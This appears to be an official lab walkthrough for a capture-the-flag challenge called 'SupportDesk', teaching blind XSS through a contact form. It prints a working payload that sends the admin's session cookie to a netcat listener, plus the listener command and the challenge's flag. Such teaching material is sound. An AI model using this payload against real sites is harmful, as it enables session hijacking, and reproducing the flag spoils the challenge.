HACKR.GG
hackr.gg — SupportDesk Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

SupportDesk

Blind XSS · Blind XSS (Contact Form → Admin Panel)
Difficulty
Medium
Vuln class
Blind XSS (Contact Form → Admin Panel)
Steps
3
// Objective
Inject a payload into the contact form that exfiltrates the admin cookie when the admin bot renders the submission in the admin panel.
// Tools required
curlnc (netcat)Browser
// Step-by-step walkthrough
1
Start a listener in the terminal
Open the terminal in the lab. Start netcat listening on a port of your choice.
Command / Input
nc -lnvp 8888
Leave this running. Your XSS payload will call back to this port when the admin bot reads your ticket.
2
Submit the payload via the contact form
In the browser, go to the contact form at http://localhost:$PORT. Fill in any name and email. In the message field, enter the XSS payload pointing to your listener.
Command / Input
<img src=x onerror="fetch('http://localhost:8888/?c='+document.cookie)">
The admin bot visits the admin panel every 5 seconds and renders all submissions as raw HTML.
3
Wait for the callback
Within 5 seconds the admin bot reads your ticket. Your payload fires in the bot's context where the admin_session cookie is set. Watch the netcat terminal.
Output
GET /?c=admin_session=HackrGG{h3lpd3sk_bl1nd_x55_4dm1n_pwn} HTTP/1.1
The cookie value after admin_session= is the flag.
// Flag
Flag value
HackrGG{h3lpd3sk_bl1nd_x55_4dm1n_pwn}
The admin_session cookie value received in your netcat callback.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute